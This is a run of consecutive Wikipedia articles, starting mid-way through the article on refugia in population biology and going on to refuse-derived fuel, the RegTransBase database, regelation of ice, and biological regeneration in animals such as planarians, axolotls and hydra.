Scholars have since expanded the idea of this mode of speciation and used it to explain population patterns in other areas of the world, such as Africa , Eurasia , and North America . Theoretically, current biogeographical patterns can be used to infer past refugia: if several unrelated species follow concurrent range patterns, the area may have been a refugium. Moreover, the current distribution of species with narrow ecological requirements tend to be associated with the spatial position of glacial refugia. [ 11 ]
One can provide a simple explanation of refugia involving core temperatures and exposure to sunlight. In the northern hemisphere , north-facing sites on hills or mountains, and places at higher elevations count as cold sites . The reverse are sun- or heat-exposed, lower-elevation, south-facing sites: hot sites . (The opposite directions apply in the southern hemisphere .) Each site becomes a refugium, one as a "cold-surviving refugium" and the other as a "hot-surviving refugium". Canyons with deep hidden areas (the opposite of hillsides, mountains, mesas, etc. or other exposed areas) lead to these separate types of refugia.
A concept not often referenced is that of "sweepstakes colonization": [ 12 ] [ 13 ] when a dramatic ecological event occurs, for example a meteor strike, and global, multiyear effects occur. The sweepstake-winning species happens to already be living in a fortunate site, and their environment is rendered even more advantageous, as opposed to the "losing" species, which immediately fails to reproduce. [ 12 ] [ 13 ]
The creation of a refugium for bats and carnivores in Thailand was a necessary step in Beta- Coronavirus evolution and jumping from bats to civets , and then to humans, which ultimately caused the Covid-19 Pandemic . [ 14 ]
Ecological understanding and geographic identification of climate refugia that remained significant strongholds for plant and animal survival during the extremes of past cooling and warming episodes largely pertain to the Quaternary glaciation cycles during the past several million years, especially in the Northern Hemisphere . A number of defining characteristics of past refugia are prevalent, including "an area where distinct genetic lineages have persisted through a series of Tertiary or Quaternary climate fluctuations owing to special, buffering environmental characteristics", "a geographical region that a species inhabits during the period of a glacial/interglacial cycle that represents the species' maximum contraction in geographical range," and "areas where local populations of a species can persist through periods of unfavorable regional climate." [ 15 ]
In systematic conservation planning , the term refugium has been used to define areas that could be used in protected area development to protect species from climate change . [ 10 ] The term has been used alternatively to refer to areas with stable habitats or stable climates. [ 10 ] More specifically, the term in situ refugium is used to refer to areas that will allow species that exist in an area to remain there even as conditions change, whereas ex situ refugium refers to an area into which species distributions can move to in response to climate change. [ 10 ] Sites that offer in situ refugia are also called resilient sites in which species will continue to have what they need to survive even as climate changes. [ 16 ]
One study found with downscaled climate models that areas near the coast are predicted to experience overall less warming than areas toward the interior of the US State of Washington . [ 17 ] Other research has found that old-growth forests are particularly insulated from climatic changes due to evaporative cooling effects from evapotranspiration and their ability to retain moisture. [ 18 ] The same study found that such effects in the Pacific Northwest would create important refugia for bird species. A review of refugia-focused conservation strategy in the Klamath-Siskiyou Ecoregion found that, in addition to old-growth forest, the northern aspects of hillslopes and deep gorges would provide relatively cool areas for wildlife and seeps or bogs surrounded by mature and old-growth forests would continue to supply moisture even as water availability decreases. [ 19 ]
Beginning in 2010 the concept of geodiversity (a term used previously in efforts to preserve scientifically important geological features) entered into the literature of conservation biologists as a potential way to identify climate change refugia and as a surrogate (in other words, a proxy used when planning for protected areas) for biodiversity. [ 20 ] [ 21 ] [ 22 ] While the language to describe this mode of conservation planning hadn't fully developed until recently, the use of geophysical diversity in conservation planning goes back at least as far as the work by Hunter and others in 1988, [ 23 ] and Richard Cowling and his colleagues in South Africa also used "spatial features" as surrogates for ecological processes in establishing conservation areas in the late 1990s and early 2000s. [ 24 ] [ 25 ] The most recent efforts have used the idea of land facets (also referred to as geophysical settings , enduring features , or geophysical stages [ 16 ] ), which are unique combinations of topographical features (such as slope steepness, slope direction, and elevation ) and soil composition, to quantify physical features. [ 21 ] The density of these facets, in turn, is used as a measure of geodiversity. [ 22 ] [ 16 ] Because geodiversity has been shown to be correlated with biodiversity, [ 2 ] even as species move in response to climate change, protected areas with high geodiversity may continue to protect biodiversity as niches get filled by the influx of species from neighboring areas. [ 16 ] Highly geodiverse protected areas may also allow for the movement of species within the area from one land facet or elevation to another. [ 16 ]
Conservation scientists, however, emphasize that the use of refugia to plan for climate change is not a substitute for fine-scale (more localized) and traditional approaches to conservation, as individual species and ecosystems will need to be protected where they exist in the present. [ 2 ] [ 26 ] They also emphasize that responding to climate change in conservation is not a substitute for actually limiting the causes of climate change. [ 2 ]
[ 27 ] | https://en.wikipedia.org/wiki/Refugium_(population_biology) |
Refuse-derived fuel ( RDF ) is a fuel produced from various types of waste such as municipal solid waste (MSW), industrial waste or commercial waste.
The World Business Council for Sustainable Development provides a definition:
"Selected waste and by-products with recoverable calorific value can be used as fuels in a cement kiln , replacing a portion of conventional fossil fuels , like coal, if they meet strict specifications. Sometimes they can only be used after pre-processing to provide ‘tailor-made’ fuels for the cement process".
RDF consists largely of combustible components of such waste, as non recyclable plastics (not including PVC ), paper cardboard, labels, and other corrugated materials. These fractions are separated by different processing steps, such as screening, air classification, ballistic separation, separation of ferrous and non ferrous materials, glass, stones and other foreign materials and shredding into a uniform grain size, or also pelletized in order to produce a homogeneous material which can be used as substitute for fossil fuels in e.g. cement plants, lime plants, coal fired power plants or as reduction agent in steel furnaces. If documented according to CEN/TC 343 it can be labeled as solid recovered fuels (SRF). [ 1 ]
Others describe the properties, such as:
There is no universal exact classification or specification which is used for such materials. Even legislative authorities have not yet established any exact guidelines on the type and composition of alternative fuels. The first approaches towards classification or specification are to be found in Germany (Bundesgütegemeinschaft für Sekundärbrennstoffe) as well as at European level (European Recovered Fuel Organisation). These approaches which are initiated primarily by the producers of alternative fuels, follow a correct approach: Only through an exactly defined standardisation in the composition of such materials can both production and utilisation be uniform worldwide.
First approaches towards alternative fuel classification:
Solid recovered fuels are part of RDF in the fact that it is produced to reach a standard such as CEN/343 ANAS. [ 2 ] A comprehensive review is now available on SRF / RDF production, quality standards and thermal recovery, including statistics on European SRF quality. [ 3 ]
In the 1950s tyres were used for the first time as refuse derived fuel in the cement industry. Continuous use of various waste-derived alternative fuels then followed in the mid-1980s with “Brennstoff aus Müll“ (BRAM) – fuel from waste – in the Westphalian cement industry in Germany.
At that time the thought of cost reduction through replacement of fossil fuels was the priority as considerable competition pressure weighed down on the industry. Since the eighties the German Cement Works Association (Verein Deutscher Zementwerke e.V. (VDZ, Düsseldorf)) has been documenting the use of alternative fuels in the federal German cement industry. In 1987 less than 5% of fossil fuels were replaced by refuse derived fuels, in 2015 its use increased to almost 62%.
Refuse-derived fuels are used in a wide range of specialized waste to energy facilities, which are using processed refuse-derived fuels with lower calorific values of 8-14MJ/kg in grain sizes of up to 500 mm to produce electricity and thermal energy (heat/steam) for district heating systems or industrial uses.
Materials such as glass and metals are removed during the treatment processing since they are non-combustible. The metal is removed using a magnet and the glass using mechanical screening . After that, an air knife is used to separate the light materials from the heavy ones. The light materials have higher calorific value and they create the final RDF. The heavy materials will usually continue to a landfill . The residual material can be sold in its processed form (depending on the process treatment) as a plain mixture or it may be compressed into pellet fuel , bricks or logs and used for other purposes either stand-alone or in a recursive recycling process. [ 4 ] RDF or SRF is the combustible sub-fraction of municipal solid waste and other similar solid waste, produced using a mix of mechanical and/or biological treatment methods such as biodrying . [ 5 ] in mechanical-biological treatment (MBT) plants. [ 3 ] During the production of RDF / SRF in MBT plants there are solid loses of otherwise combustible material, [ 6 ] which generates a debate whether the production and use of RDF / SRF is resource efficient or not over traditional one-step combustion of residual MSW in incineration ( Energy from waste ) plants. [ 7 ]
In the process of making RDF pellets from shredded SRF, drying is often required. Typically, the moisture content needs to be reduced to below 20% to produce high-calorific, high-density RDF pellets. Drying RDF often requires a substantial amount of energy, so choosing an inexpensive heat source is preferable.
The production of RDF may involve the following steps:
RDF can be used in a variety of ways to produce electricity or as a replacement of fossil fuels. It can be used alongside traditional sources of fuel in coal power plants. In Europe RDF can be used in the cement kiln industry, where strict air pollution control standards of the Waste Incineration Directive apply. The main limiting factor for RDF / SRF use in cement kilns is its total chlorine (Cl) content, with mean Cl content in average commercially manufactured SRF being at 0.76 w/w on a dry basis (± 0.14% w/wd, 95% confidence). [ 8 ] RDF can also be fed into plasma arc gasification modules & pyrolysis plants. Where the RDF is capable of being combusted cleanly or in compliance with the Kyoto Protocol , RDF can provide a funding source where unused carbon credits are sold on the open market via a carbon exchange. [ clarification needed ] However, the use of municipal waste contracts [ clarification needed ] and the bankability [ jargon ] of these solutions is still a relatively new concept, thus RDF's financial advantage may be debatable. The European market for the production of RDF have been grown fast due to the European landfill directive and the imposition of landfill taxes. Refuse derived fuel (RDF) exports from the UK to Europe and beyond are expected to have reached 3.3 million tonnes in 2015, representing a near-500,000 tonnes increase on the previous year.
The biomass fraction of RDF and SRF has a monetary value under multiple greenhouse gas protocols, such as the European Union Emissions Trading Scheme and the Renewable Obligation Certificate program in the United Kingdom. Biomass is considered to be carbon-neutral since the CO 2 liberated from the combustion of biomass is recycled in plants. The combusted biomass fraction of RDF/SRF is used by stationary combustion operators to reduce their overall reported CO 2 emissions.
Several methods have been developed by the European CEN 343 working group to determine the biomass fraction of RDF/SRF. The initial two methods developed (CEN/TS 15440) were the manual sorting method and the selective dissolution method; a comparative assessment of these two methods is available. [ 9 ] An alternative, but more expensive method was developed using the principles of radiocarbon dating. A technical review (CEN/TR 15591:2007) outlining the carbon-14 method was published in 2007, and a technical standard of the carbon dating method (CEN/TS 15747:2008) was published in 2008. [ 10 ] In the United States, there is already an equivalent carbon-14 method under the standard method ASTM D6866.
Although carbon-14 dating can determine the biomass fraction of RDF/SRF, it cannot determine directly the biomass calorific value. Determining the calorific value is important for green certificate programs such as the Renewable Obligation Certificate program. These programs award certificates based on the energy produced from biomass. Several research papers, including the one commissioned by the Renewable Energy Association in the UK, have been published that demonstrate how the carbon-14 result can be used to calculate the biomass calorific value.
There are major challenges related to the quality assurance and especially the accurate determination of the RDF / SRF thermal recovery (combustion) properties, due to their inherently variable (heterogeneous) composition. Recent advances enable optimal sub-sampling schemes [ 11 ] to arrive from the SRF / SRF sample of say 1 kg to the g or mg to be tested in the analytical devices such as the bomb calorimetry or TGA. With such solutions representative sub-sampling can be secured, but less so for the chlorine content. [ 12 ] The new evidence suggests that the theory of sampling (ToS) may be overestimating the processing effort needed, to obtain a representative sub-sample.
In 2009, in response to the Naples waste management issue in Campania , Italy, the Acerra incineration facility was completed at a cost of over €350 million. The incinerator burns 600,000 tons of waste per year. [ 13 ] The energy produced from the facility is enough to power 200,000 households per year. [ 14 ]
The first full-scale waste-to-energy facility in the US was the Arnold O. Chantland Resource Recovery Plant, built in 1975 located in Ames, Iowa. This plant also produces RDF that is sent to a local power plant for supplemental fuel. [ 15 ]
The city of Manchester , in the north west of England, is in the process of awarding a contract for the use of RDF which will be produced by proposed mechanical biological treatment facilities as part of a huge PFI contract. The Greater Manchester Waste Disposal Authority has recently announced there is significant market interest in initial bids for the use of RDF which is projected to be produced in tonnages up to 900,000 tonnes per annum. [ 16 ] [ 17 ]
During spring 2008 Bollnäs Ovanåkers Renhållnings AB (BORAB) in Sweden, started their new waste-to-energy plant. Municipal solid waste as well as industrial waste is turned into refuse-derived fuel. The 70,000-80,000 tonnes RDF that is produced per annum is used to power the nearby BFB-plant, which provides the citizens of Bollnäs with electricity and district heating . [ 18 ] [ 19 ]
In late March 2017, Israel launched its own RDF plant at the Hiriya Recycling Park; which daily will intake about 1,500 tonnes of household waste, which will amount to around half a million tonnes of waste each year, with an estimated production of 500 tonnes of RDF daily. [ 20 ] The plant is part of Israel's "diligent effort to improve and advance waste management in Israel." [ 21 ]
In October 2018, the UAE 's Ministry of Climate Change and Environment signed a concession agreement with Emirates RDF ( BESIX , Tech Group Eco Single Owner, Griffin Refineries) to develop and operate a RDF facility in the Emirate of Umm Al Quwain . The facility will receive 1,000 tons per day of household waste and convert the waste of 550,000 residents from the emirates of Ajman and Umm Al Quwain into RDF. RDF will be used in cement factories to partially replace the traditional use of gas or coal. [ 22 ] | https://en.wikipedia.org/wiki/Refuse-derived_fuel |
RegTransBase is database of regulatory interactions and transcription factor binding sites in prokaryotes [ 1 ]
This Biological database -related article is a stub . You can help Wikipedia by expanding it .
This biophysics -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/RegTransBase |
Regelation is the phenomenon of ice melting under pressure and refreezing when the pressure is reduced. This can be demonstrated by looping a fine wire around a block of ice, with a heavy weight attached to it. The pressure exerted on the ice slowly melts it locally, permitting the wire to pass through the entire block. The wire's track will refill as soon as pressure is relieved, so the ice block will remain intact even after wire passes completely through. This experiment is possible for ice at −10 °C or cooler, and while essentially valid, the details of the process by which the wire passes through the ice are complex. [ 1 ] The phenomenon works best with high thermal conductivity materials such as copper, since latent heat of fusion from the top side needs to be transferred to the lower side to supply latent heat of melting. In short, the phenomenon in which ice converts to liquid due to applied pressure and then re-converts to ice once the pressure is removed is called regelation.
Regelation was discovered by Michael Faraday . It occurs only for substances such as ice, that have the property of expanding upon freezing, for the melting points of those substances decrease with the increasing external pressure. The melting point of ice falls by 0.0072 °C for each additional atm of pressure applied. For example, a pressure of 500 atmospheres is needed for ice to melt at −4 °C. [ 2 ]
For a normal crystalline ice far below its melting point, there will be some relaxation of the atoms near the surface. Simulations of ice near to its melting point show that there is significant melting of the surface layers rather than a symmetric relaxation of atom positions. Nuclear magnetic resonance provided evidence for a liquid layer on the surface of ice. In 1998, using atomic force microscopy , Astrid Döppenschmidt and Hans-Jürgen Butt measured the thickness of the liquid-like layer on ice to be roughly 32 nm at −1 °C, and 11 nm at −10 °C. [ 3 ]
The surface melting can account for the following:
A glacier can exert a sufficient amount of pressure on its lower surface to lower the melting point of its ice. The melting of the ice at the glacier's base allows it to move from a higher elevation to a lower elevation. Liquid water may flow from the base of a glacier at lower elevations when the temperature of the air is above the freezing point of water.
At least one 1992 article suggests it is a slightly misconceived misconception to ascribe regelation to ice skating . [ 4 ] The problem with matching the (large) magnitude of the water-ice p-V gradient above the triple point boundary with the magnitudes of prevailing temperature and pressure in the case of the ice skating context applies equally in the context of the classic lab experiment with a copper wire cutting through an 10cm ice block with say a 28 swg wire. The misconception is not that these observations fail to be regelation but that regelation can be explained (solely) in terms of the magnitude of p-V gradient above the triple point. There is much more going on. Regelation is empirical—it is a phenomenon as was, for example, Brownian Motion before, during, and arguably even after Einstein modelled it. It has been so widely observed and described that we generalise to describing it in terms of pressure causing increased surface melting. The recognition of this phenomenon in all the mentioned contexts is not in doubt. Car tyres work in snow even though there is some increased surface melting because they have tread which allows water to be liberated.
Ice skating is given as an example of regelation; however, the pressure required is much greater than the weight of a skater. Additionally, regelation does not explain how one can ice skate at sub-zero (0°C) temperatures. [ 5 ]
Compaction and creation of snow balls is another example from old texts. Here, the pressure required is far greater than the pressure that can be applied by hand. A counter example is that cars do not melt snow as they run over it. | https://en.wikipedia.org/wiki/Regelation |
Regeneration in biology is the process of renewal, restoration, and tissue growth that makes genomes , cells , organisms , and ecosystems resilient to natural fluctuations or events that cause disturbance or damage. [ 1 ] Every species is capable of regeneration, from bacteria to humans. [ 2 ] [ 3 ] [ 4 ] Regeneration can either be complete [ 5 ] where the new tissue is the same as the lost tissue, [ 5 ] or incomplete [ 6 ] after which the necrotic tissue becomes fibrotic . [ 6 ]
At its most elementary level, regeneration is mediated by the molecular processes of gene regulation and involves the cellular processes of cell proliferation , morphogenesis and cell differentiation . [ 7 ] [ 8 ] Regeneration in biology, however, mainly refers to the morphogenic processes that characterize the phenotypic plasticity of traits allowing multi-cellular organisms to repair and maintain the integrity of their physiological and morphological states. Above the genetic level, regeneration is fundamentally regulated by asexual cellular processes. [ 9 ] Regeneration is different from reproduction. For example, hydra perform regeneration but reproduce by the method of budding .
The regenerative process occurs in two multi-step phases: the preparation phase and the redevelopment phase. [ 10 ] [ 11 ] Regeneration begins with an amputation which triggers the first phase. Right after the amputation, migrating epidermal cells form a wound epithelium which thickens, through cell division, throughout the first phase to form a cap around the site of the wound. [ 10 ] The cells underneath this cap then begin to rapidly divide and form a cone shaped end to the amputation known as a blastema. Included in the blastema are skin, muscle, and cartilage cells that de-differentiate and become similar to stem cells in that they can become multiple types of cells. Cells differentiate to the same purpose they originally filled meaning skin cells again become skin cells and muscle cells become muscles. These de-differentiated cells divide until enough cells are available at which point they differentiate again and the shape of the blastema begins to flatten out. It is at this point that the second phase begins, the redevelopment of the limb. In this stage, genes signal to the cells to differentiate themselves and the various parts of the limb are developed. The end result is a limb that looks and operates identically to the one that was lost, usually without any visual indication that the limb is newly generated.
The hydra and the planarian flatworm have long served as model organisms for their highly adaptive regenerative capabilities. [ 12 ] Once wounded, their cells become activated and restore the organs back to their pre-existing state. [ 13 ] The Caudata ("urodeles"; salamanders and newts ), an order of tailed amphibians , is possibly the most adept vertebrate group at regeneration, given their capability of regenerating limbs, tails, jaws, eyes and a variety of internal structures. [ 2 ] The regeneration of organs is a common and widespread adaptive capability among metazoan creatures. [ 12 ] In a related context, some animals are able to reproduce asexually through fragmentation , budding, or fission . [ 9 ] A planarian parent, for example, will constrict, split in the middle, and each half generates a new end to form two clones of the original. [ 14 ]
Echinoderms (such as the sea star), crayfish, many reptiles, and amphibians exhibit remarkable examples of tissue regeneration. The case of autotomy , for example, serves as a defensive function as the animal detaches a limb or tail to avoid capture. After the limb or tail has been autotomized, cells move into action and the tissues will regenerate. [ 15 ] [ 16 ] [ 17 ] In some cases a shed limb can itself regenerate a new individual. [ 18 ] Limited regeneration of limbs occurs in most fishes and salamanders, and tail regeneration takes place in larval frogs and toads (but not adults). The whole limb of a salamander or a triton will grow repeatedly after amputation. In reptiles, chelonians, crocodilians and snakes are unable to regenerate lost parts, but many (not all) kinds of lizards, geckos and iguanas possess regeneration capacity in a high degree. Usually, it involves dropping a section of their tail and regenerating it as part of a defense mechanism. While escaping a predator, if the predator catches the tail, it will disconnect. [ 19 ]
Ecosystems can be regenerative. Following a disturbance, such as a fire or pest outbreak in a forest, pioneering species will occupy, compete for space, and establish themselves in the newly opened habitat. The new growth of seedlings and community assembly process is known as regeneration in ecology . [ 20 ] [ 21 ]
Pattern formation in the morphogenesis of an animal is regulated by genetic induction factors that put cells to work after damage has occurred. Neural cells, for example, express growth-associated proteins, such as GAP-43 , tubulin , actin , an array of novel neuropeptides , and cytokines that induce a cellular physiological response to regenerate from the damage. [ 22 ] Many of the genes that are involved in the original development of tissues are reinitialized during the regenerative process. Cells in the primordia of zebrafish fins, for example, express four genes from the homeobox msx family during development and regeneration. [ 23 ]
"Strategies include the rearrangement of pre-existing tissue, the use of adult somatic stem cells and the dedifferentiation and/or transdifferentiation of cells, and more than one mode can operate in different tissues of the same animal. [ 1 ] All these strategies result in the re-establishment of appropriate tissue polarity, structure and form." [ 24 ] : 873 During the developmental process, genes are activated that serve to modify the properties of cell as they differentiate into different tissues. Development and regeneration involves the coordination and organization of populations cells into a blastema , which is "a mound of stem cells from which regeneration begins". [ 25 ] Dedifferentiation of cells means that they lose their tissue-specific characteristics as tissues remodel during the regeneration process. This should not be confused with the transdifferentiation of cells which is when they lose their tissue-specific characteristics during the regeneration process, and then re-differentiate to a different kind of cell. [ 24 ]
Many arthropods can regenerate limbs and other appendages following either injury or autotomy . [ 26 ] Regeneration capacity is constrained by the developmental stage and ability to molt. [ citation needed ]
Crustaceans , which continually molt, can regenerate throughout their lifetimes. [ 27 ] While molting cycles are generally hormonally regulated, limb amputation induces premature molting. [ 26 ] [ 28 ]
Hemimetabolous insects such as crickets can regenerate limbs as nymphs, before their final molt. [ 29 ]
Holometabolous insects can regenerate appendages as larvae prior to the final molt and metamorphosis . Beetle larvae, for example, can regenerate amputated limbs. Fruit fly larvae do not have limbs but can regenerate their appendage primordia, imaginal discs . [ 30 ] In both systems, the regrowth of the new tissue delays pupation. [ 30 ] [ 31 ]
Mechanisms underlying appendage limb regeneration in insects and crustaceans are highly conserved. [ 32 ] During limb regeneration species in both taxa form a blastema that proliferates and grows to repattern the missing tissue. [ 33 ]
Arachnids , including scorpions, are known to regenerate their venom, although the content of the regenerated venom is different from the original venom during its regeneration, as the venom volume is replaced before the active proteins are all replenished. [ 34 ]
The fruit fly Drosophila melanogaster is a useful model organism to understand the molecular mechanisms that control regeneration, especially gut and germline regeneration. [ 30 ] In these tissues, resident stem cells continually renew lost cells. [ 30 ] The Hippo signaling pathway was discovered in flies and was found to be required for midgut regeneration. Later, this conserved signaling pathway was also found to be essential for regeneration of many mammalian tissues, including heart, liver, skin, and lung, and intestine. [ 35 ]
Many annelids (segmented worms) are capable of regeneration. [ 36 ] For example, Chaetopterus variopedatus and Branchiomma nigromaculata can regenerate both anterior and posterior body parts after latitudinal bisection. [ 37 ] The relationship between somatic and germline stem cell regeneration has been studied at the molecular level in the annelid Capitella teleta . [ 38 ] Leeches , however, appear incapable of segmental regeneration. [ 39 ] Furthermore, their close relatives, the branchiobdellids , are also incapable of segmental regeneration. [ 39 ] [ 36 ] However, certain individuals, like the lumbriculids, can regenerate from only a few segments. [ 39 ] Segmental regeneration in these animals is epimorphic and occurs through blastema formation. [ 39 ] Segmental regeneration has been gained and lost during annelid evolution, as seen in oligochaetes , where head regeneration has been lost three separate times. [ 39 ]
Along with epimorphosis, some polychaetes like Sabella pavonina experience morphallactic regeneration. [ 39 ] [ 40 ] Morphallaxis involves the de-differentiation, transformation, and re-differentation of cells to regenerate tissues. How prominent morphallactic regeneration is in oligochaetes is currently not well understood. Although relatively under-reported, it is possible that morphallaxis is a common mode of inter-segment regeneration in annelids. Following regeneration in L. variegatus , past posterior segments sometimes become anterior in the new body orientation, consistent with morphallaxis. [ citation needed ]
Following amputation, most annelids are capable of sealing their body via rapid muscular contraction. Constriction of body muscle can lead to infection prevention. In certain species, such as Limnodrilus , autolysis can be seen within hours after amputation in the ectoderm and mesoderm . Amputation is also thought to cause a large migration of cells to the injury site, and these form a wound plug.
Tissue regeneration is widespread among echinoderms and has been well documented in starfish (Asteroidea) , sea cucumbers (Holothuroidea) , and sea urchins (Echinoidea). Appendage regeneration in echinoderms has been studied since at least the 19th century. [ 41 ] In addition to appendages, some species can regenerate internal organs and parts of their central nervous system. [ 42 ] In response to injury starfish can autotomize damaged appendages. Autotomy is the self-amputation of a body part, usually an appendage. Depending on severity, starfish will then go through a four-week process where the appendage will be regenerated. [ 43 ] Some species must retain mouth cells to regenerate an appendage, due to the need for energy. [ 44 ] The first organs to regenerate, in all species documented to date, are associated with the digestive tract. Thus, most knowledge about visceral regeneration in holothurians concerns this system. [ 45 ]
Regeneration research using Planarians began in the late 1800s and was popularized by T.H. Morgan at the beginning of the 20th century. [ 44 ] Alejandro Sanchez-Alvarado and Philip Newmark transformed planarians into a model genetic organism in the beginning of the 20th century to study the molecular mechanisms underlying regeneration in these animals. [ 46 ] Planarians exhibit an extraordinary ability to regenerate lost body parts. For example, a planarian split lengthwise or crosswise will regenerate into two separate individuals. In one experiment, T.H. Morgan found that a piece corresponding to 1/279th of a planarian [ 44 ] or a fragment with as few as 10,000 cells can successfully regenerate into a new worm within one to two weeks. [ 47 ] After amputation, stump cells form a blastema formed from neoblasts , pluripotent cells found throughout the planarian body. [ 48 ] New tissue grows from neoblasts with neoblasts comprising between 20 and 30% of all planarian cells. [ 47 ] Recent work has confirmed that neoblasts are totipotent since one single neoblast can regenerate an entire irradiated animal that has been rendered incapable of regeneration. [ 49 ] In order to prevent starvation a planarian will use their own cells for energy, this phenomenon is known as de-growth. [ 13 ]
Limb regeneration in the axolotl and newt has been extensively studied and researched. Although researchers have developed genetically altered axolotls, live cell imaging remains difficult due to the large size of adult axolotls. To fix this issue, they use small juvenile axolotls, focus on smaller amputations like digits, and reduce light distortion caused by refraction in water by using iodixanol, a substance that is safe for living cells and tissues. [ 50 ] The nineteenth century studies of this subject are reviewed in Holland (2021). [ 51 ] Urodele amphibians, such as salamanders and newts, display the highest regenerative ability among tetrapods. [ 52 ] [ 51 ] As such, they can fully regenerate their limbs, tail, jaws, and retina via epimorphic regeneration leading to functional replacement with new tissue. [ 53 ] Salamander limb regeneration occurs in two main steps. First, the local cells dedifferentiate at the wound site into progenitor to form a blastema . [ 54 ] Second, the blastemal cells will undergo cell proliferation , patterning, cell differentiation and tissue growth using similar genetic mechanisms that deployed during embryonic development. [ 55 ] Ultimately, blastemal cells will generate all the cells for the new structure. [ 52 ]
After amputation, the epidermis migrates to cover the stump in 1–2 hours, forming a structure called the wound epithelium (WE). [ 56 ] Epidermal cells continue to migrate over the WE, resulting in a thickened, specialized signaling center called the apical epithelial cap (AEC). [ 57 ] Over the next several days there are changes in the underlying stump tissues that result in the formation of a blastema (a mass of dedifferentiated proliferating cells). As the blastema forms, pattern formation genes – such as Hox A and HoxD – are activated as they were when the limb was formed in the embryo . [ 58 ] [ 59 ] The positional identity of the distal tip of the limb (i.e. the autopod, which is the hand or foot) is formed first in the blastema. Intermediate positional identities between the stump and the distal tip are then filled in through a process called intercalation. [ 58 ] Motor neurons , muscle, and blood vessels grow with the regenerated limb, and reestablish the connections that were present prior to amputation. The time that this entire process takes varies according to the age of the animal, ranging from about a month to around three months in the adult and then the limb becomes fully functional. Researchers at Australian Regenerative Medicine Institute at Monash University have published that when macrophages , which eat up material debris, [ 60 ] were removed, salamanders lost their ability to regenerate and formed scarred tissue instead. [ 61 ] The axolotl salamander Ambystoma mexicanum , an organism with exceptional limb regenerative capabilities, likely undergoes epigenetic alterations in its blastema cells that enhance expression of genes involved in limb regeneration. The Axolotl has very little blood and has an excess of epidermal cells. This allows the affected area to then flourish with epidermal cells and continued gene expression allows the area to regenerate to its natural being. [ 62 ]
In spite of the historically few researchers studying limb regeneration, remarkable progress has been made recently in establishing the neotenous amphibian the axolotl ( Ambystoma mexicanum ) as a model genetic organism. This progress has been facilitated by advances in genomics , bioinformatics , and somatic cell transgenesis in other fields, that have created the opportunity to investigate the mechanisms of important biological properties, such as limb regeneration, in the axolotl. [ 55 ] The Ambystoma Genetic Stock Center (AGSC) is a self-sustaining, breeding colony of the axolotl supported by the National Science Foundation as a Living Stock Collection. Located at the University of Kentucky, the AGSC is dedicated to supplying genetically well-characterized axolotl embryos, larvae, and adults to laboratories throughout the United States and abroad. An NIH -funded NCRR grant has led to the establishment of the Ambystoma EST database, the Salamander Genome Project (SGP) that has led to the creation of the first amphibian gene map and several annotated molecular data bases, and the creation of the research community web portal. [ 63 ] In 2022, a first spatiotemporal map revealed key insights about axolotl brain regeneration , also providing the interactive Axolotl Regenerative Telencephalon Interpretation via Spatiotemporal Transcriptomic Atlas . [ 64 ] [ 65 ]
Anurans (frogs) can only regenerate their limbs during embryonic development. [ 66 ] Reactive oxygen species (ROS) appear to be required for a regeneration response in the anuran larvae. [ 67 ] ROS production is essential to activate the Wnt signaling pathway, which has been associated with regeneration in other systems. [ 67 ]
Once the limb skeleton has developed in frogs, regeneration does not occur ( Xenopus can grow a cartilaginous spike after amputation). [ 66 ] The adult Xenopus laevis is used as a model organism for regenerative medicine . In 2022, a cocktail of drugs and hormones ( 1,4-DPCA , BDNF , growth hormone , resolvin D5, and retinoic acid ), in a single dose lasting 24 hours, was shown to trigger long-term leg regeneration in adult X. laevis . Instead of a single spike, a paddle-shaped growth is obtained at the end of the limb by 18 months. [ 68 ]
Hydra is a genus of freshwater polyp in the phylum Cnidaria with highly proliferative stem cells that gives them the ability to regenerate their entire body. [ 69 ] Any fragment larger than a few hundred epithelial cells that is isolated from the body has the ability to regenerate into a smaller version of itself. [ 69 ] The high proportion of stem cells in the hydra supports its efficient regenerative ability. [ 70 ]
Regeneration among hydra occurs as foot regeneration arising from the basal part of the body, and head regeneration, arising from the apical region. [ 69 ] Regeneration tissues that are cut from the gastric region contain polarity, which allows them to distinguish between regenerating a head in the apical end and a foot in the basal end so that both regions are present in the newly regenerated organism. [ 69 ] Head regeneration requires complex reconstruction of the area, while foot regeneration is much simpler, similar to tissue repair. [ 71 ] In both foot and head regeneration, however, there are two distinct molecular cascades that occur once the tissue is wounded: early injury response and a subsequent, signal-driven pathway of the regenerating tissue that leads to cellular differentiation . [ 70 ] This early-injury response includes epithelial cell stretching for wound closure, the migration of interstitial progenitors towards the wound, cell death , phagocytosis of cell debris, and reconstruction of the extracellular matrix. [ 70 ]
Regeneration in hydra has been defined as morphallaxis, the process where regeneration results from remodeling of existing material without cellular proliferation. [ 72 ] [ 73 ] If a hydra is cut into two pieces, the remaining severed sections form two fully functional and independent hydra, approximately the same size as the two smaller severed sections. [ 69 ] This occurs through the exchange and rearrangement of soft tissues without the formation of new material. [ 70 ]
During Hydra head regeneration there are coordinated gene expression and chromatin regulation changes. [ 74 ] An enhancer is a short DNA sequence (50–1500 base pairs) that can be bound by transcription factors to increase the transcription of a particular gene . In the enhancer regions that are activated during head regeneration, a set of transcription factor motifs commonly occur that appear to facilitate coordinated gene expression. [ 74 ]
Owing to a limited literature on the subject, birds are believed to have very limited regenerative abilities as adults. Some studies [ 75 ] on roosters have suggested that birds can adequately regenerate some parts of the limbs and depending on the conditions in which regeneration takes place, such as age of the animal, the inter-relationship of the injured tissue with other muscles, and the type of operation, can involve complete regeneration of some musculoskeletal structure. Werber and Goldschmidt (1909) found that the goose and duck were capable of regenerating their beaks after partial amputation [ 75 ] and Sidorova (1962) observed liver regeneration via hypertrophy in roosters. [ 76 ] Birds are also capable of regenerating the hair cells in their cochlea following noise damage or ototoxic drug damage. [ 77 ] Despite this evidence, contemporary studies suggest reparative regeneration in avian species is limited to periods during embryonic development. An array of molecular biology techniques have been successful in manipulating cellular pathways known to contribute to spontaneous regeneration in chick embryos. [ 78 ] For instance, removing a portion of the elbow joint in a chick embryo via window excision or slice excision and comparing joint tissue specific markers and cartilage markers showed that window excision allowed 10 out of 20 limbs to regenerate and expressed joint genes similarly to a developing embryo. In contrast, slice excision did not allow the joint to regenerate due to the fusion of the skeletal elements seen by an expression of cartilage markers. [ 79 ]
Similar to the physiological regeneration of hair in mammals, birds can regenerate their feathers in order to repair damaged feathers or to attract mates with their plumage. Typically, seasonal changes that are associated with breeding seasons will prompt a hormonal signal for birds to begin regenerating feathers. This has been experimentally induced using thyroid hormones in the Rhode Island Red Fowls. [ 80 ]
